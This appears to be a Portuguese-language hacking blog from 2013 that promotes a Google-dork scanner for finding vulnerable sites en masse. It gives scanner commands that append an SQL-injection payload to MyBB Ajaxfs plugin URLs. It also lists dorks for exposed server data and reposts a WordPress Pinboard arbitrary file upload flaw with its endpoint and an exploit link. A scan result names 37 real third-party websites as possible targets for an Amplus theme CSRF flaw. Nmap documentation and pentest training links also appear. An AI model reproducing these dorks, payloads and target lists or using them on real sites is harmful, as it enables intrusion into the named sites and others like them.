quarta-feira, 27 de novembro de 2013

Usando SCANNER INURL para encontrar falhas / Mybb Ajaxfs Plugin Sql Injection vulnerability.

Usando o [ SCANNER INURL 1.0 CONSOLE ], para encontrar erros "Mybb Ajaxfs Plugin Sql Injection vulnerability".

MyBB (MyBulletinBoard) é um software de sistema de fóruns (bulletin board system) desenvolvido pelo grupo MyBB, é escrito utilizando as linguagens PHP e MySQL, está licenciado como um software livre sob uma GNU Lesser General Public License.

Para explorar a falha no plugin Ajaxfs devemos efetuar uma busca, mas vamos usar
SCANNER INURL CONSOLE.

Download SCANNER INURL CONSOLE:
https://code.google.com/p/scanner-inurl/

Dork[1]::: inurl:ajaxfs.php?tooltip=
Dork[2]::: inurl:ajaxfs.php
Dork[3]::: inurl:/ajaxfs ext:php 

Entenda a falha:
http://pastebin.com/XyDrh5SG

Configurando para o scan.
Comando:
php botConsole.php --host='www.google.com.br' --dork="inurl:ajaxfs.php?tooltip=" --arquivo='resultado.txt' --tipoerro='1' --exploit="'\--0x27;"

php botConsole.php --host='www.google.com.br' --dork="inurl:ajaxfs.php?tooltip=" --arquivo='resultado.txt' --tipoerro='1' --exploit="'\--0x27;"


Executando

Executando SCANNER INURL





Dorks captura de informações server's

Dorks captura de informações server's

DORKS:
comment:Pages containing network or vulnerability data***-----
filetype:log intext:"ConnectionManager2"
"apricot - admin" 00h
"Network Host Assessment Report" "Internet Scanner"
"Output produced by SysWatch *"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
"Powered by phpOpenTracker" Statistics
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"SnortSnarf alert page"
"This file was generated by Nessus"
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"Traffic Analysis for" "RMON Port * on unit *"
"Version Info" "Boot Version" "Internet Settings"
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
ACID "by Roman Danyliw" filetype:php -----Analysis Console for Incident Databases 12-Jul-2004 866-----
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
filetype:pdf "Assessment Report" nessus
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:vsd vsd network -samples -examples
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intitle:"ADSL Configuration page"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"BNBT Tracker Info"
intitle:"Microsoft Site Server Analysis"
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"start.managing.the.device" remote pbx acc
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"twiki" inurl:"TWikiUsers"
inurl:"/catalog.nsf" intitle:catalog
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:phpSysInfo/ "created by phpsysinfo"
inurl:portscan.php "from Port"|"Port Range"
inurl:statrep.nsf -gov
inurl:testcgi xitami
inurl:webutil.pl
"Looking Glass" (inurl:"lg/" | inurl:lookingglass) -----Looking Glass-----
intitle:That.Site.Running Apache

[ SCANNER INURLBR / TERMINAL. ]


Mais uma ferramenta para os dorkeiros de plantão.


* SCANNER INURLBR 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Motor de busca GOOGLE
* Permissão Leitura & Escrita
* BUSCA POSSÍVEIS VULNERABILIDADES
* SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
* OPÇÕES PARA SETAR PROXY.
* MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.
* SETAR EXPLOIT.
* PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.
* GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br

--host='www.google.com.br'
--dork='sua dork'
--arquivo='seusResultados.txt'
--tipoerro='1 ou 2'
--exploit='O que vai ser injetado no final de cada url'
--achar='Funciona com Tipoerro 2 para procurar strings personalizadas em cada URL' 
--ipproxy='IP PROXY EX: 172.16.0.150' 
--porta='PORTA do proxy'

O PARÂMETRO --tipoerro tem duas opções:
1 - O Scanner vai procurar erros padrões do script SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
O mesmo vinculado com seu EXPLOIT que pode ser deixado vazio --exploit='' o exploit sempre será usado no final das urls,Padrão básico
sqlinjection.
2 - Opção para personalizar sua execução onde é habilitado o parâmetro --achar='',Achar funciona para procurar sua definição dentro das urls encontradas.
Ex[1]: --achar='WordPress' isso vai procurar a palavra WordPress em todas urls encontradas pelo scanner.
Ex[2]: --tipoerro='2' --exploit='wp-login.php' --achar='WordPress'\r"; 

Exemplos de uso.
Comando:
php botConsole.php  --host='www.google.co.bw' --dork='site:br inurl:/wp-content/themes/ "Index of /"' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Index of'
[ SCANNER INURLBR / TERMINAL. ] php botConsole.php  --host='www.google.co.bw' --dork='site:br inurl:/wp-content/themes/ "Index of /"' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Index of'


Comando:
php botConsole.php ajuda
php botConsole.php ajuda


Comando:
php botConsole.php hosts
php botConsole.php hosts


Baixar: https://code.google.com/p/scanner-inurl/

Guia de Referência do Nmap (Página do Manual)


Guia de Referência do Nmap (Página do Manual)


O Nmap (“Network Mapper”) é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. Ela foi desenhada para escanear rapidamente redes amplas, embora também funcione muito bem contra hosts individuais. O Nmap utiliza pacotes IP em estado bruto (raw) de maneira inovadora para determinar quais hosts estão disponíveis na rede, quais serviços (nome da aplicação e versão) os hosts oferecem, quais sistemas operacionais (e versões de SO) eles estão executando, que tipos de filtro de pacotes/firewalls estão em uso, e dezenas de outras características. Embora o Nmap seja normalmente utilizado para auditorias de segurança, muitos administradores de sistemas e rede consideram-no útil para tarefas rotineiras tais como inventário de rede, gerenciamento de serviços de atualização agendados, e monitoramento de host ou disponibilidade de serviço.

A saída do Nmap é uma lista de alvos escaneados, com informações adicionais de cada um dependendo das opções utilizadas. Uma informação chave é a “tabela de portas interessantes”. Essa tabela lista o número da porta e o protocolo, o nome do serviço e o estado. O estado pode ser aberto (open), filtrado (filtered), fechado (closed), ou não-filtrado (unfilterd). Aberto (open) significa que uma aplicação na máquina-alvo está escutando as conexões/pacotes naquela porta. Filtrado (filtered) significa que o firewall, filtro ou outro obstáculo de rede está bloqueando a porta de forma que o Nmap não consegue dizer se ela está aberta (open) ou fechada (closed). Portas fechadas (closed)não possuem uma aplicação escutando nelas, embora possam abrir a qualquer instante. Portas são classificadas como não filtradas (unfiltered)quando elas respondem às sondagens do Nmap, mas o Nmap não consegue determinar se as portas estão abertas ou fechadas. O Nmap reporta as combinações aberta|filtrada (open|filtered)e fechada|filtrada (closed|filtered)quando não consegue determinar qual dos dois estados descrevem melhor a porta. A tabela de portas também pode incluir detalhes de versão de software quando a detecção de versão for solicitada. Quando um scan do protocolo IP é solicitado (-sO), o Nmap fornece informações dos protocolos IP suportados ao invés de portas que estejam abertas.

Além da tabela de portas interessantes, o Nmap pode fornecer informações adicionais sobre os alvos, incluíndo nomes de DNS reverso, possível sistema operacional, tipos de dispositivos e endereços MAC.

Um scan típico do Nmap é mostrado em Example 1, “Uma amostra de scan do Nmap”. Os únicos argumentos que o Nmap utiliza nesse exemplo são -A, para habilitar a detecção de SO e a versão, -T4 para execução mais rápida, e os hostnames de dois alvos.
::::Guia de Referência::::
Notas da Tradução
Sumário das Opções
Especificação de Alvo
Descoberta de Hosts
Fundamentos do Escaneamento de Portas
Técnicas de Escaneamento de Portas
Especificação de Portas e Ordem de Scan
Detecção de Serviço e Versão
Detecção de SO
Temporização (Timing) e Desempenho
Evitando e enganando o Firewall/IDS
Saída (Output)
Opções Diversas (Miscelânea)
Interação em Tempo de Execução
Exemplos
Bugs
Autor

Dominando Nmap Scripting Engine.

Dominando Nmap Scripting Engine.

• NSE Intro & Usage
• Large-scale Scan #1: SMB/MSRPC
• Large-scale Scan #2: Favicon
• Writing NSE Scripts
• Live Script Writing Demo
• Nmap News
• Final Notes & Q/A.

http://nmap.org/presentations/BHDC10/Fyodor-David-BlackHatUSA-2010-Slides.pdf

terça-feira, 26 de novembro de 2013

Wordpress Themes Pinboard Arbitrary File Upload Vulnerability

BUG WP THEMES PINBOARD


EXPLOIT WP ~~~
#Author : ReC0ded
#Vendor : http://themify.me/
#Download : http://themify.me/themes/Pinboard
#Date : 22, November 2013.
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload


#Dork[1] : inurl:/wp-content/themes/pinboard/
#Dork[2] : inurl:site:br /themes/pinboard/
 #Dork[3] : inurl:/themes/pinboard/ ext:php

Falha:
#Exploit : http://SITEWPVULL.COM.BR/{PASTA}/wp-content/themes/pinboard/themify/themify-ajax.php

ARQUIVO UPADO:

http://SITEWPVULL.COM.BR/{PASTA}/wp-content/themes/pinboard/uploads/{ARQUIVO}.php


EXPLOIT UPLOAD:http://pastebin.com/FwSP3bQT

sexta-feira, 22 de novembro de 2013

Usando SCANNER INURL para encontrar Vull's WP

EXPLOIT
Wordpress Amplus Theme - CSRF Vulnerability
Wordpress Amplus Theme - CSRF Vulnerability
RESULTADO
Usando SCANNER INURL Wordpress Amplus Theme - CSRF Vulnerability

BOT - SCANNER PRIV8 / - INURLBR

TOTAL DE URL's: 86

EXPLOIT USADO:

DORK: inurl:/themes/amplus/
ENCONTRAR: /amplus/scripts/
TOTAL DE POSSÍVEIS VULL: 37
ARQUIVO COM RESULTADO: resultados.txt

LISTA:


http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/
http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/
http://washingtonavenuecommons.com/wp-content/themes/amplus/scripts/prettyphoto/images/backgrounds/
http://telplus-inc.com/blog/wp-content/themes/amplus/scripts/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/fonts/
www.intuneautoworks.com/home/wp.../
http://www.intuneautoworks.com/home/wp-content/themes/amplus/scripts/prettyphoto/
http://wnglaw.com/wp-content/themes/amplus/scripts/prettyphoto/
http://wnglaw.com/wp-content/themes/amplus/scripts/fonts/
http://wnglaw.com/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://punc.psiada.org/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://amaboston.org/wp-content/themes/amplus/scripts/syntaxhighlighter/styles/
http://www.avia-sys.com/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://www.promisenaturalfoodsandbakery.com/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/
http://light-eco-distribution.com/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.gettysburgfarmmarket.com/home/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://www.gettysburgfarmmarket.com/home/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/light_square/
http://www.dominiquediprima.com/wellness/wp-content/themes/amplus/scripts/fonts/
http://ringhello.co.uk/wp-content/themes/amplus/scripts/prettyphoto/
http://www.theglobalwarmingfoundation.org/wp-content/themes/amplus/scripts/syntaxhighlighter/styles/
www.theglobalwarmingfoundation.org/wp.../
http://www.kidzrchampions2.com/wp-content/themes/amplus/scripts/prettyphoto/images/thumbnails/
www.kidzrchampions2.com/wp.../
http://www.buc-holland.com/wp-content/themes/amplus/css/
http://training.dontsayno.in/wp-content/themes/amplus/amplus_v1.6/scripts/prettyphoto/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/syntaxhighlighter/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/css/
http://192.185.16.232/~wnglaw/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/prettyphoto/js/
http://www.laroccaallevamento.it/site/wp-content/themes/amplus/scripts/prettyphoto/images/prettyPhoto/dark_square/
http://www.gambit.ph/themes/amplus
http://takeadriver.nl/wp-content/themes/amplus/scripts/syntaxhighlighter/scripts/
http://www.friendslookup.com/wp-content-themes-amplus-functions-timthumb


Exploit: http://www.exploit-db.com/exploits/29669/

segunda-feira, 11 de novembro de 2013

Exercícios são baseados em vulnerabilidades comuns encontrados em sistemas.


0xESTUDOS 0xPENTEST


Os Exercícios são baseados em vulnerabilidades comuns encontrados em sistemas diferentes. As questões não são emulados. Nós fornecemos-lhe sistemas reais com vulnerabilidades reais.

Faça o download do ISO eo PDF. Inicie o ISO usando qualquer software de virtualização e começar a aprender!

WEB FOR PENTESTER II
http://files.pentesterlab.com/web_for_pentester_II/web_for_pentester_II.pdf

FROM SQL INJECTION TO SHELL II
http://files.pentesterlab.com/from_sqli_to_shell_II/from_sqli_to_shell_II.pdf

CVE-2012-6081: MOINMOIN CODE EXECUTION
http://files.pentesterlab.com/cve-2012-6081/cve-2012-6081.pdf

WEB FOR PENTESTER
http://files.pentesterlab.com/web_for_pentester/web_for_pentester.pdf


AXIS2 AND TOMCAT MANAGER
http://files.pentesterlab.com/axis2_and_tomcat_manager/axis2_and_tomcat_manager.pdf


CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability
http://files.pentesterlab.com/cve-2008-1930/cve-2008-1930.pdf


From SQL injection to Shell: PostgreSQL edition
http://files.pentesterlab.com/from_sqli_to_shell_pg_edition/from_sqli_to_shell_pg_edition.pdf

Rack Cookies and Commands Injection
http://files.pentesterlab.com/rack_cookies_and_commands_injection/rack_cookies_and_commands_injection.pdf


Introduction to Linux Host Review
http://files.pentesterlab.com/linux_host_review/linux_host_review.pdf

CVE-2012-2661: ActiveRecord SQL injection
http://files.pentesterlab.com/cve-2012-2661/cve-2012-2661.pdf

CVE-2012-1823: PHP CGI
http://files.pentesterlab.com/cve-2012-1823/cve-2012-1823.pdf


PHP Include And Post Exploitation
http://files.pentesterlab.com/php_include_and_post_exploitation/php_include_and_post_exploitation.pdf


From SQL injection to Shell
http://files.pentesterlab.com/from_sqli_to_shell/from_sqli_to_shell.pdf

Principal: https://www.pentesterlab.com/exercises/